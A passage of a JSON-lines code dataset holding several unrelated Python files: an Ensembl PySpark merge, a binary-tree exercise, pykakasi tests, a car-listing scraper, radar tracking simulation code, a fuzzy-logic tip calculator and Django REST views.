withColumnRenamed(\"stable_id\", \"ensdb_transcript_id\").\n withColumnRenamed(\"version\", \"ensdb_transcript_version\").\n withColumnRenamed(\"created_date\", \"ensdb_transcript_created_date\").\n withColumnRenamed(\"modified_date\", \"ensdb_transcript_modified_date\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n joint_table = final_locus.join(final_misc, on=\"ensdb_pk_transcript_id\", how=\"inner\")\n joint_table.write.parquet(\n \"ensdb_transcripts.parquet.d\",\n mode=\"overwrite\"\n )\n return joint_table\n\n\ndef merge_exons():\n _lh.info(\"Merging exons...\")\n final_locus = (\n exon_table.\n select(\n \"exon_id\",\n \"seq_region_id\",\n \"seq_region_start\",\n \"seq_region_end\",\n \"seq_region_strand\"\n ).\n join(\n seq_region_synonym_converter,\n on=\"seq_region_id\",\n how=\"inner\"\n ).\n drop(\"seq_region_id\").\n withColumnRenamed(\"synonym\", \"seqname\").\n withColumnRenamed(\"seq_region_start\", \"start\").\n withColumnRenamed(\"seq_region_end\", \"end\").\n withColumnRenamed(\"seq_region_strand\", \"strand\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_misc = (\n exon_table.\n select(\n \"exon_id\",\n \"stable_id\",\n \"version\",\n \"created_date\",\n \"modified_date\"\n ).\n withColumnRenamed(\"stable_id\", \"ensdb_exon_id\").\n withColumnRenamed(\"version\", \"ensdb_exon_version\").\n withColumnRenamed(\"created_date\", \"ensdb_exon_created_date\").\n withColumnRenamed(\"modified_date\", \"ensdb_exon_modified_date\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_mapping = (\n exon_transcript_table.\n select(\n \"transcript_id\",\n \"exon_id\"\n ).\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n\n joint_table = (\n final_locus.\n join(final_mapping, on=\"ensdb_pk_exon_id\", how=\"inner\").\n join(final_misc, on=\"ensdb_pk_exon_id\", how=\"inner\")\n )\n joint_table.write.parquet(\n \"ensdb_exons.parquet.d\",\n mode=\"overwrite\"\n )\n return joint_table\n\n\ndef merge_repeats():\n _lh.info(\"Merging repeats...\")\n final_locus = (\n repeat_feature_table.\n select(\n \"repeat_feature_id\",\n \"seq_region_id\",\n \"seq_region_start\",\n \"seq_region_end\",\n \"seq_region_strand\"\n ).\n join(\n seq_region_synonym_converter,\n on=\"seq_region_id\",\n how=\"inner\"\n ).\n drop(\"seq_region_id\").\n withColumnRenamed(\"synonym\", \"seqname\").\n withColumnRenamed(\"seq_region_start\", \"start\").\n withColumnRenamed(\"seq_region_end\", \"end\").\n withColumnRenamed(\"seq_region_strand\", \"strand\").\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n final_misc = (\n repeat_feature_table.\n select(\n \"repeat_feature_id\",\n \"repeat_consensus_id\",\n \"score\",\n \"repeat_start\",\n \"repeat_end\"\n ).\n join(\n repeat_consensus_table.drop(\"repeat_consensus\"),\n on=\"repeat_consensus_id\",\n how=\"inner\"\n ).\n withColumnsRenamed(PRIMIARY_KEY_RENAME_TABLE)\n )\n joint_table = final_locus.join(final_misc, on=\"ensdb_pk_repeat_feature_id\", how=\"inner\")\n joint_table.write.parquet(\n \"ensdb_repeats.parquet.d\",\n mode=\"overwrite\"\n )\n return joint_table\n\n\n\nif __name__ == \"__main__\":\n gene_table = merge_gene()\n transcripts_table = merge_transcripts()\n exons_table = merge_exons()\n repeats_table = merge_repeats()\n\n","repo_name":"WanluLiuLab/labw_utils","sub_path":"explore/ensembl_database_dump/transcript_merge.spark.py","file_name":"transcript_merge.spark.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"74896156306","text":"\"\"\"\nGiven a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.\n\nAn example is the root-to-leaf path 1->2->3 which represents the number 123.\n\nFind the total sum of all root-to-leaf numbers.\n\nFor example,\n\n 1\n / \\\n 2 3\nThe root-to-leaf path 1->2 represents the number 12.\nThe root-to-leaf path 1->3 represents the number 13.\n\nReturn the sum = 12 + 13 = 25.\n\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def sumNumbers(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n total = [0]\n def depthFirstSearch(numSoFar, node, total):\n if node == None:\n return\n numSoFar = numSoFar + str(node.val)\n \n if node.left == None and node.right == None:\n total[0] += int(numSoFar)\n \n if node.left != None:\n depthFirstSearch(numSoFar, node.left, total)\n \n if node.right != None:\n depthFirstSearch(numSoFar, node.right, total)\n \n \n depthFirstSearch(\"\", root, total)\n return total[0]\n \n ","repo_name":"Faiz-zz-zz/interview_questions","sub_path":"bin_tree_sum_to_leaves.py","file_name":"bin_tree_sum_to_leaves.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"45105735556","text":"# -*- coding: utf-8 -*-\nimport os,sys,bz2\nfrom types import *\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\ntry: #python2\n import cPickle as pickle\nexcept: #python3\n import pickle\n\nimport shutil\nimport pykakasi.genkanwadict as genkanwadict\n\nclass TestGenkanwadict(unittest.TestCase):\n kanwa = None\n def constructor(self):\n self.kanwa = genkanwadict.mkkanwa()\n self.assertEqual(self.kanwa, object)\n \n def test_mkdict(self):\n if self.kanwa is None:\n self.kanwa = genkanwadict.mkkanwa()\n\n src = os.path.join('tests','kanadict.utf8')\n dst = os.path.join('/tmp','test_kanadict.pickle')\n self.kanwa.mkdict(src, dst)\n # load test\n with open(dst,'rb') as f:\n (mydict, maxkeylen) = pickle.load(f)\n os.unlink(dst)\n self.assertTrue(isinstance(mydict, dict))\n self.assertEqual(maxkeylen, 3)\n\n def test_mkkanwa(self):\n if self.kanwa is None:\n self.kanwa = genkanwadict.mkkanwa()\n\n src = os.path.join('tests','kakasidict.utf8')\n dst = os.path.join('/tmp','test_kanwadict2.db')\n self.kanwa.run(src, dst)\n os.unlink(os.path.join('/tmp','test_kanwadict2.db'))\n","repo_name":"Mahfooz511/Furiganize","sub_path":"pykakasi-master/tests/test_genkanwadict.py","file_name":"test_genkanwadict.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70952932306","text":"# Framework imports\nimport requests\nimport bs4\n\n\nclass WebmotorsCrawler(object):\n\n \"\"\"\n Cralwer for Webmotors Site\n \"\"\"\n\n def __init__(self, brand, model, init_year, final_year):\n super(WebmotorsCrawler, self).__init__()\n self.brand = brand\n self.model = model\n self.init_year = init_year\n self.final_year = final_year\n\n def get_final_url(self):\n url = 'http://www.webmotors.com.br/comprar/carros/novos-usados/'\n url = url + 'veiculos-todos-estados/{brand}/{model}/?tipoveiculo=carros'\n url = url + '&tipoanuncio=novos|usados&marca1={brand}&modelo1={model}'\n url = url + '&anode={init_year}&anoate={final_year}&estado1=veiculos-todos-estados'\n url = 
url.format(brand=self.brand,\n model=self.model,\n init_year=self.init_year,\n final_year=self.final_year)\n\n return url\n\n def extract_data(self):\n response = requests.get(self.get_final_url())\n soup = bs4.BeautifulSoup(response.text, \"html.parser\")\n\n # setting arrays\n arrayPrices = []\n arrayYear = []\n arrayColors = []\n arrayKm = []\n arrayCambio = []\n\n # Details\n details = soup.select('div#anuncios .tipo1 .info .features')\n for detail in details:\n text = detail.get_text()\n text = text.replace('\\n\\n', \"\")\n text = text.split('\\n')\n arrayYear.append(text[0])\n arrayColors.append(text[1])\n arrayKm.append(text[2])\n arrayCambio.append(text[3])\n\n # Links\n links = soup.select('div#anuncios .tipo1')\n arrayLinks = [link.get('href') for link in links]\n\n # Titles\n titles = soup.select('div#anuncios .tipo1 .info .make-model')\n arrayTitles = [title.get_text() for title in titles]\n\n # Subtitles\n subtitles = soup.select('div#anuncios .tipo1 .info .version')\n arraySubtitles = [subtitle.get_text() for subtitle in subtitles]\n\n # Photos\n photos = soup.select('div#anuncios .c-after .photo img')\n arrayPhotos = [photo.get('data-original') for photo in photos]\n\n # Price\n prices = soup.select('div#anuncios .c-after .photo .price')\n\n for price in prices:\n text = price.get_text()\n text = text.replace('\\n', \"\")\n text = text.replace('\\r', \"\")\n text = text.replace('\\t', \"\")\n\n arrayPrices.append(text)\n\n arrayFinal = []\n\n # create the dict\n for i, photo in enumerate(arrayPhotos):\n car = {'title': arrayTitles[i],\n 'subtitle': arraySubtitles[i],\n 'link': arrayLinks[i],\n 'photo': arrayPhotos[i],\n 'price': arrayPrices[i],\n 'year': arrayYear[i],\n 'color': arrayColors[i],\n 'km': arrayKm[i],\n 'cambio': arrayCambio[i]\n }\n arrayFinal.append(car)\n\n return arrayFinal\n","repo_name":"dietherwerk/test_crawler","sub_path":"crawlers/webmotors.py","file_name":"webmotors.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6440391092","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\ncase_study = 'Lane-keeping'\n# case_study = 'AV'\n\nif case_study == 'AV':\n fold_idx = 1#4\n config_str = 'config_2'#'config_4'\nelse:\n fold_idx = 4\n config_str = 'config_4'\n\nnum_tr_fot = 20\n\npath = \"output/\" + case_study + \"/fold_\" + str(fold_idx) + \"_tr_\" + str(num_tr_fot) + \"/\"\ntrace_file_name = \"simul_trace.csv\"\nraw_df = pd.read_csv(path + trace_file_name)\n\n\nmodel_str_list = ['Random_loss', 'PR_loss', 'RF_loss', 'BCxGAIL_nondet_ppo_loss']\nmodel_title_list = ['Random', 'PR', 'RF', 'ENVI']\n# [FOT,Random_loss,RF_loss,PR_loss,\n# BC_det_loss,BC_det_eucl,BC_det_dtw,\n# BC_nondet_loss,BC_nondet_eucl,BC_nondet_dtw,\n# GAIL_det_ppo_loss,GAIL_det_ppo_eucl,GAIL_det_ppo_dtw,\n# GAIL_nondet_ppo_loss,GAIL_nondet_ppo_eucl,GAIL_nondet_ppo_dtw,\n# BCxGAIL_det_ppo_loss,BCxGAIL_det_ppo_eucl,BCxGAIL_det_ppo_dtw,\n# BCxGAIL_nondet_ppo_loss,BCxGAIL_nondet_ppo_eucl,BCxGAIL_nondet_ppo_dtw]\n\n\nnum_x_figs = len(model_str_list)\n\ndefault_font_size = 10\nplt.style.use('seaborn-whitegrid')\nfig, axes = plt.subplots(1, num_x_figs, figsize=(14, 4), dpi=200)\n#top_ax = fig.add_subplot(111)\n\n\n\nFOT_trace = raw_df['FOT_' + config_str].to_numpy()\nif case_study == 'Lane-keeping':\n FOT_trace = (FOT_trace * 40) / 3\nelse:\n FOT_trace = FOT_trace * 1000 + 1200\n\nfor x_fig_idx in range(num_x_figs):\n ax_temp = axes[x_fig_idx]\n title = model_str_list[x_fig_idx] + 
'_' + config_str\n simul_trace = raw_df[title].to_numpy()\n\n if case_study == 'Lane-keeping':\n simul_trace = (simul_trace * 40) / 3\n else:\n simul_trace = simul_trace * 1000 + 1200\n\n\n ax_temp.plot(FOT_trace, label='FOT')\n ax_temp.plot(simul_trace, label='Simulation')\n if case_study == 'AV':\n # ax_temp.set_ylim(-1, -0.4)\n ax_temp.set_ylabel('Displacement (' + r'$mm$' + ')', fontsize=default_font_size * 1.2)\n ax_temp.set_xticks([i for i in range(0, 200, 40)], [i * 50 for i in range(0, 200, 40)])\n else:\n ax_temp.set_ylabel('Displacement (' + r'$mm$' + ')', fontsize=default_font_size * 1.2)\n ax_temp.set_xticks([i for i in range(0, 100, 20)], [i * 50 for i in range(0, 100, 20)])\n\n\n ax_temp.set_title(model_title_list[x_fig_idx], fontsize = default_font_size * 1.2)\n\n\n ax_temp.set_xlabel('Time (' + r'$ms$' + ')', fontsize=default_font_size * 1.2)\n\n\n\n\nfig.subplots_adjust(bottom=0.2)\nlines, labels = fig.axes[-1].get_legend_handles_labels()\nfig.legend(lines, labels, bbox_to_anchor=(0.5, 0.01), loc='lower center', ncol=2, frameon=True)\n\nplt.subplots_adjust(left=0.08,\n bottom=0.2,\n right=0.97,\n top=0.92,\n wspace=0.35,\n hspace=0.2)\n\n# fig.supxlabel('Time (tick)', fontsize = default_font_size * 1.5)\n# fig.supylabel('Lane color observed by the lane-keeping system version $\\mathit{x}$', fontsize = default_font_size * 1.5)\n# fig.suptitle('FOT and simulation trace of the environment models', fontsize = default_font_size * 1.8)\n# plt.show()\nplt.savefig(path + 'trace_vis.png')\n\n","repo_name":"yongjunshin/ENVI","sub_path":"simulation_visualization.py","file_name":"simulation_visualization.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12538903624","text":"# %% [markdown]\n# # Adaptive Tracking Simulation Example\n\n# %% [markdown]\n# ## Setup\n\n# %%\nfrom datetime import datetime, timedelta\nstart_time = datetime.now()\n\n# %% [markdown]\n# ## Radar system\n\n# %%\nfrom mpar_sim.radar import PhasedArrayRadar\nfrom mpar_sim.beam.beam import RectangularBeam, GaussianBeam\nfrom mpar_sim.looks.look import Look\nfrom mpar_sim.resource_management import PAPResourceManager\nfrom mpar_sim.schedulers import BestFirstScheduler\nimport numpy as np\n\nradar = PhasedArrayRadar(\n position=np.array([[0], [0], [0]]),\n position_mapping=(0, 2, 4),\n rotation_offset=np.array([[0], [0], [0]]),\n # Array parameters\n n_elements_x=32,\n n_elements_y=32,\n element_spacing=0.5, # Wavelengths\n element_tx_power=10,\n # System parameters\n center_frequency=3e9,\n system_temperature=290,\n noise_figure=4,\n # Scan settings\n beam_shape=GaussianBeam,\n az_fov=[-90, 90],\n el_fov=[-90, 90],\n # Detection settings\n false_alarm_rate=1e-6,\n)\nradar.timestamp = start_time\n\nmanager = PAPResourceManager(radar,\n max_duty_cycle=0.1,\n max_bandwidth=100e6)\nscheduler = BestFirstScheduler(manager,\n sort_key=\"priority\",\n reverse_sort=True,\n max_queue_size=10,\n max_time_delta=timedelta(seconds=0.5))\n\n\n# %% [markdown]\n# Raster scan agent\n\n# %%\nfrom mpar_sim.agents.raster_scan import RasterScanAgent\nimport numpy as np\n\nsearch_agent = RasterScanAgent(\n azimuth_scan_limits=np.array([-30, 30]),\n elevation_scan_limits=np.array([-5, 5]),\n azimuth_beam_spacing=0.8,\n elevation_beam_spacing=0.8,\n azimuth_beamwidth=15,\n elevation_beamwidth=15,\n bandwidth=100e6,\n pulsewidth=1e-6,\n prf=5e3,\n n_pulses=10,\n)\n\n# %% [markdown]\n# ## Tracker Components\n\n# %% [markdown]\n# Create 
tracker\n\n# %%\nfrom stonesoup.measures import Mahalanobis, Euclidean\nfrom stonesoup.hypothesiser.distance import DistanceHypothesiser\nfrom stonesoup.updater.kalman import ExtendedKalmanUpdater\nfrom stonesoup.predictor.kalman import KalmanPredictor\nfrom stonesoup.models.transition.linear import CombinedLinearGaussianTransitionModel, ConstantVelocity\nfrom stonesoup.gater.distance import DistanceGater\n\n# KF prediction model. Assuming it's matched to the true target model for now\ntransition_model = CombinedLinearGaussianTransitionModel([\n ConstantVelocity(10),\n ConstantVelocity(10),\n ConstantVelocity(0.0),\n])\npredictor = KalmanPredictor(transition_model)\n\nupdater = ExtendedKalmanUpdater(measurement_model=None)\n\nhypothesizer = DistanceHypothesiser(\n predictor, updater, measure=Mahalanobis(), missed_distance=100)\ngater = DistanceGater(hypothesizer, measure=Mahalanobis(), gate_threshold=25)\n\n\n# %% [markdown]\n# Create the data associator\n\n# %%\nfrom stonesoup.dataassociator.neighbour import GNNWith2DAssignment\ndata_associator = GNNWith2DAssignment(gater)\n\n# %% [markdown]\n# Create the deleter\n\n# %%\nfrom stonesoup.deleter.time import UpdateTimeStepsDeleter, UpdateTimeDeleter\ndeleter = UpdateTimeDeleter(timedelta(seconds=2))\n\n\n# %% [markdown]\n# Create the initiator\n\n# %%\nfrom stonesoup.types.state import GaussianState\nfrom stonesoup.initiator.simple import MultiMeasurementInitiator, SimpleMeasurementInitiator\nimport numpy as np\nfrom mpar_sim.initiator.initators import MofNInitiator\n\n\ninitiator = MofNInitiator(\n prior_state=GaussianState([0, 0, 0, 0, 0, 0], np.diag([0, 0, 0, 0, 0, 0])),\n measurement_model=None,\n deleter=deleter,\n data_associator=data_associator,\n updater=updater,\n confirmation_threshold=[4,5],\n)\n\n# %% [markdown]\n# Tracking agent\n\n# %%\nfrom mpar_sim.agents.track_while_scan import TWSAgent\nfrom mpar_sim.agents.adaptive_track import AdaptiveTrackAgent\nfrom mpar_sim.beam.common import aperture2beamwidth\n\ntrack_agent = AdaptiveTrackAgent(\n initiator,\n data_associator,\n predictor,\n updater,\n deleter,\n # Adaptive track parameters\n track_sharpness=0.25,\n min_revisit_rate=0.5,\n max_revisit_rate=5,\n confirm_rate=20,\n # Task parameters\n azimuth_beamwidth=5,\n elevation_beamwidth=5,\n bandwidth=100e6,\n pulsewidth=1e-6,\n prf=5e3,\n n_pulses=100\n)\n\n# track_agent = TWSAgent(initiator, data_associator, updater, deleter)\n\n\n# %% [markdown]\n# ## Run the simulation\n\n# %%\nimport operator\nfrom stonesoup.types.groundtruth import GroundTruthPath, GroundTruthState\nfrom stonesoup.types.array import CovarianceMatrix\nfrom stonesoup.types.state import StateVector\nimport random\n# Set the simulation seed\nseed = np.random.randint(0, 2**32-1)\nnp.random.seed(seed)\nrandom.seed(seed)\n\n# Simulation-level parameters\nn_steps = 500\ninclude_noise = True\n\n# Target generation parameters\nn_targets_max = 5\ninitial_state_mean = StateVector([100, 10, 0, 0, 0, 0])\ninitial_state_covariance = CovarianceMatrix(np.diag([100, 5, 20, 5, 0, 0]))\ninitial_state = GaussianState(initial_state_mean, initial_state_covariance)\ndeath_probability = 0.0\nbirth_probability = 0.1\ntarget_rcs = 1\n\n\ntruths = []\nall_truths = []\nconfirmed_tracks = set()\ntentative_tracks = set()\nall_measurements = []\nall_tracks = set()\n\n# Simulation time variables. 
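Two clocks are kept: 'time' advances the ground-truth scenario, while 'scheduler_time' advances look-by-look as the radar executes scheduled tasks.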
\ntime = start_time\nscheduler_time = start_time\nfor istep in range(n_steps):\n detections = set()\n\n ########################################\n # Target birth/death\n ########################################\n # Delete targets according to the death process\n truths = [truth for truth in truths if np.random.rand() > death_probability]\n # Also randomly delete targets if we have exceeded the maximum target count\n if len(truths) > n_targets_max:\n indices = np.random.choice(\n len(truths), len(truths) - n_targets_max, replace=False)\n for index in sorted(indices, reverse=True):\n del truths[index]\n\n # Targets, be reborn!\n for _ in range(np.random.poisson(birth_probability)):\n\n if len(truths) >= n_targets_max:\n break\n\n # Sample an initial state from the mean and covariance defined above\n # (a rough draw: the covariance is applied directly rather than a matrix square root)\n state_vector = initial_state.state_vector + \\\n initial_state.covar @ np.random.randn(initial_state.ndim, 1)\n # Keep the initial x position and x velocity non-negative\n if state_vector[0] < 0:\n state_vector[0] = -state_vector[0]\n if state_vector[1] < 0:\n state_vector[1] = -state_vector[1]\n state = GroundTruthState(\n state_vector=state_vector,\n timestamp=time,\n )\n\n # Give the target an RCS\n # TODO: Create a GroundTruthTarget class with an RCS attribute\n state.rcs = target_rcs\n # Add to the list of truths\n truth = GroundTruthPath([state])\n truths.append(truth)\n all_truths.append(truth)\n\n ########################################\n # Allocate resources and simulate\n ########################################\n # Generate looks from each agent\n search_look = search_agent.act(current_time=scheduler_time)\n track_looks = track_agent.act(current_time=scheduler_time)\n looks = [search_look] + track_looks\n\n # Schedule new looks, sorted so that the task with the nearest end time is selected first below\n scheduler.schedule(looks, scheduler_time)\n manager.allocated_tasks.sort(\n key=operator.attrgetter(\"end_time\"), reverse=True)\n
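 # Tasks are popped from the tail of this list, so the descending end-time sort means the look that finishes earliest is always simulated next.\n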
 # Minimum start time of all scheduled tasks. When this changes, a new \"batch\" of tasks has been allocated and the scenario needs to be updated\n min_start_time = min([task.start_time for task in manager.allocated_tasks]\n ) if manager.allocated_tasks else time\n\n # Get the next look and simulate it\n look = manager.allocated_tasks.pop()\n scheduler_time = look.end_time\n radar.load_look(look)\n detections = radar.measure(truths, noise=include_noise)\n\n # Update tracks\n confirmed_tracks = track_agent.update_tracks(detections, time)\n\n # Advance the scenario clock and propagate targets when a new batch begins\n if min_start_time > time:\n dt = min_start_time - time\n time = min_start_time\n # Update targets\n for truth in truths:\n truth.append(GroundTruthState(\n transition_model.function(truth[-1],\n noise=include_noise,\n time_interval=dt),\n timestamp=time))\n truth[-1].rcs = target_rcs\n\n all_measurements.append(detections)\n all_tracks |= confirmed_tracks\n\n\n# %% [markdown]\n# ## Plot simulation results\n\n# %%\nfrom stonesoup.plotter import Plotterly\n\nplotter = Plotterly()\nplotter.plot_sensors(radar, \"Radar\")\nplotter.plot_ground_truths(all_truths, [0, 2])\nplotter.plot_measurements(all_measurements, [0, 2])\nplotter.plot_tracks(all_tracks, [0, 2])\n\nplotter.fig\n\n# %%\nfrom stonesoup.metricgenerator.basicmetrics import BasicMetrics\n\nbasic_generator = BasicMetrics()\n\nfrom stonesoup.metricgenerator.manager import SimpleManager\n\nmetric_manager = SimpleManager([basic_generator],\n associator=data_associator)\n","repo_name":"ShaneFlandermeyer/mpar-sim","sub_path":"examples/adaptive_tracking.py","file_name":"adaptive_tracking.py","file_ext":"py","file_size_in_byte":8847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39589540789","text":"import numpy as np\nimport skfuzzy as fuzz\nfrom skfuzzy import control as ctrl\n\n# 1. DECLARE THE INPUT AND OUTPUT VARIABLES\n\n# INPUTS\ncalidad_comida = ctrl.Antecedent(np.arange(0, 101, 1), 'calidad_comida')\nservicio = ctrl.Antecedent(np.arange(0, 101, 1), 'servicio')\n# OUTPUT\npropina = ctrl.Consequent(np.arange(0, 101, 1), 'propina')\n\n# 2. ASSIGN THE MEMBERSHIP FUNCTIONS\n\n# Custom membership function population\n\ncalidad_comida['desagradable'] = fuzz.trimf(calidad_comida.universe, [0, 0, 20])\ncalidad_comida['mediocre'] = fuzz.gaussmf(calidad_comida.universe, 30, 15)\ncalidad_comida['normal'] = fuzz.gaussmf(calidad_comida.universe, 50, 5.0)\ncalidad_comida['rica'] = fuzz.trimf(calidad_comida.universe, [50, 70, 85])\ncalidad_comida['deliciosa'] = fuzz.gbellmf(calidad_comida.universe, 20, 70, 100)\n\nservicio['nulo'] = fuzz.trimf(servicio.universe, [0, 0, 20])\nservicio['malo'] = fuzz.trimf(servicio.universe, [15, 20, 40])\nservicio['normal'] = fuzz.trimf(servicio.universe, [30, 50, 60])\nservicio['bueno'] = fuzz.trimf(servicio.universe, [50, 70, 85])\nservicio['excelente'] = fuzz.trimf(servicio.universe, [75, 100, 100])\n\npropina['minimo'] = fuzz.trimf(propina.universe, [0, 0, 20])\npropina['poca'] = fuzz.trimf(propina.universe, [15, 20, 40])\npropina['media'] = fuzz.trimf(propina.universe, [30, 50, 60])\npropina['moderada'] = fuzz.trimf(propina.universe, [50, 70, 85])\npropina['alta'] = fuzz.trimf(propina.universe, [75, 100, 100])\n
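\n# Illustrative check of a membership degree (the probe value 45 is arbitrary):\n# degree = fuzz.interp_membership(propina.universe, propina['media'].mf, 45)\n# 'degree' lies in [0, 1] and says how strongly a 45 counts as a 'media' (medium) tip.\n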
\n# 3. BUILD THE RULE SET (IF-THEN)\n\nrule1 = ctrl.Rule(calidad_comida['desagradable'] | servicio['nulo'], propina['minimo'])\nrule2 = ctrl.Rule(calidad_comida['mediocre'] | servicio['malo'], propina['poca'])\nrule3 = ctrl.Rule(calidad_comida['normal'] | servicio['normal'], propina['media'])\nrule4 = ctrl.Rule(calidad_comida['rica'] | servicio['bueno'], propina['moderada'])\nrule5 = ctrl.Rule(calidad_comida['deliciosa'] | servicio['excelente'], propina['alta'])\n\n# 4. DEFINE THE CONTROL SYSTEM\n\ntipping_ctrl = ctrl.ControlSystem([rule1, rule2, rule3, rule4, rule5])\ntipping = ctrl.ControlSystemSimulation(tipping_ctrl)\n\n# 5. DEFINE THE NUMERIC INPUTS FOR EACH INPUT VARIABLE\ninput_calidad = int(input('Enter your score for \"FOOD QUALITY\" (1-100): '))\ninput_servicio = int(input('Enter your score for \"SERVICE\" (1-100): '))\ntipping.input['calidad_comida'] = input_calidad\ntipping.input['servicio'] = input_servicio\n\n# 6. RUN THE FUZZIFICATION AND DEFUZZIFICATION OF THE SYSTEM\ntipping.compute()\n\n# 7. PRINT THE RESULTS\noutput_propina = tipping.output['propina']\nprint('The appropriate tip would be:', output_propina)","repo_name":"willandru/AI","sub_path":"INTRO_AI/FUZZY/propinas/propinas.py","file_name":"propinas.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21960284302","text":"from django.conf import settings\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom social_impact.models import Project, SIORMeasurement, Publication\n\n\nclass ProjectsMetaData(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None):\n projects = Project.objects.filter(created_by=request.user).order_by('start_date')\n active_projects = Project.objects.filter(status='active', created_by=request.user).count()\n projects_with_impact = SIORMeasurement.objects.filter(created_by=request.user).distinct('project').count()\n response = {\n 'total_projects': projects.count(),\n 'projects_source': 'Cordis',\n 'active_projects': active_projects,\n 'start_year': projects[0].start_date.year,\n 'end_year': projects.order_by('-start_date')[0].start_date.year,\n 'projects_with_impact': projects_with_impact\n }\n return Response(response)\n\n\n
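# ProjectList splits the user's projects into two tables: rows in 'body_impact'\n# carry extra 'impact_targets' and 'impact_scores' keys, rows in 'body_no_impact' do not.\n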
class ProjectList(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None):\n projects = Project.objects.filter(created_by=request.user).order_by('-start_date')\n sior_measurements = SIORMeasurement.objects.filter(created_by=request.user)\n projects_with_impact = [measurement.project.id for measurement in sior_measurements.distinct('project')]\n table_impact, table_no_impact = [], []\n for project in projects:\n coordinador = f\"{project.coordinator} ({project.coordinator_country})\"\n dict_row = {\n 'id': project.id,\n 'name': project.name,\n 'description': project.description,\n 'status': project.get_status_display(),\n 'start_date': project.start_date.strftime(\"%d/%m/%Y\"),\n 'end_date': project.end_date.strftime(\"%d/%m/%Y\"),\n 'coordinator': coordinador\n }\n if project.id in projects_with_impact:\n project_impacts = sior_measurements.filter(project=project)\n impact_targets, impact_scores = [], []\n for project_impact in project_impacts:\n impact_targets.append(project_impact.get_sdg_display())\n impact_scores.append(project_impact.score)\n dict_row['impact_targets'] = impact_targets\n dict_row['impact_scores'] = impact_scores\n table_impact.append(dict_row)\n else:\n table_no_impact.append(dict_row)\n response = {'body_impact': table_impact,\n 'body_no_impact': table_no_impact}\n return Response(response)\n\n\nclass ProjectImpactOverall(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None, **kwargs):\n project_id = kwargs.get('id')\n project_impacts = SIORMeasurement.objects.filter(created_by=request.user, project__id=project_id)\n targets, scores = [], []\n for project_impact in project_impacts:\n targets.append(project_impact.get_sdg_display())\n scores.append(int(project_impact.score))\n response = {\n 'name': project_impacts[0].project.name,\n 'start_date': project_impacts[0].project.start_date.strftime(\"%d/%m/%Y\"),\n 'end_date': project_impacts[0].project.end_date.strftime(\"%d/%m/%Y\"),\n 'targets': ' '.join(targets),\n 'overall_score': max(scores)\n }\n return Response(response)\n\n\nclass ProjectImpactDetails(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n\n def get(self, request, format=None, **kwargs):\n project_id = kwargs.get('id')\n project_impacts = SIORMeasurement.objects.filter(created_by=request.user, project__id=project_id)\n impacts = []\n for project_impact in project_impacts:\n file_url = '/'.join(project_impact.evidence.publication.file.url.split('/')[1:])\n dict_url = settings.MEDIA_URL + '/'.join(project_impact.evidence.search.dictionary.url.split('/')[1:])\n impact_dict = {\n 'evidence': {\n 'name': project_impact.evidence.publication.name,\n 'page': project_impact.evidence.page,\n 'sentence': project_impact.evidence.sentence,\n 'impact_keywords': project_impact.evidence.impact_mention,\n 'is_scientific': str(project_impact.scientific_evidence),\n 'file': file_url\n },\n 'social_target': project_impact.get_sdg_display(),\n 'percentage_improvement': project_impact.percentage_improvement,\n 'description_achievement': project_impact.description_achievement,\n 'sustainability': project_impact.sustainability,\n 'description_sustainability': project_impact.description_sustainability,\n 'replicability': project_impact.replicability,\n 'description_replicability': project_impact.description_replicability,\n 'score': project_impact.score,\n 'dictionary': dict_url\n }\n impacts.append(impact_dict)\n docs = Publication.objects.filter(created_by=request.user, project_id=project_id)\n project_reports = []\n # Only list documents that did not contribute any impact evidence\n for doc in docs:\n if all(doc.name != impact['evidence']['name'] for impact in impacts):\n doc_url = '/'.join(doc.file.url.split('/')[1:])\n project_reports.append({'name': doc.name, 'url': doc_url})\n response = {\n 'impacts': impacts,\n 'docs': project_reports\n }\n return Response(response)","repo_name":"social-link-analytics-group-bsc/impact-app","sub_path":"backend/social_impact/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22184953021","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n
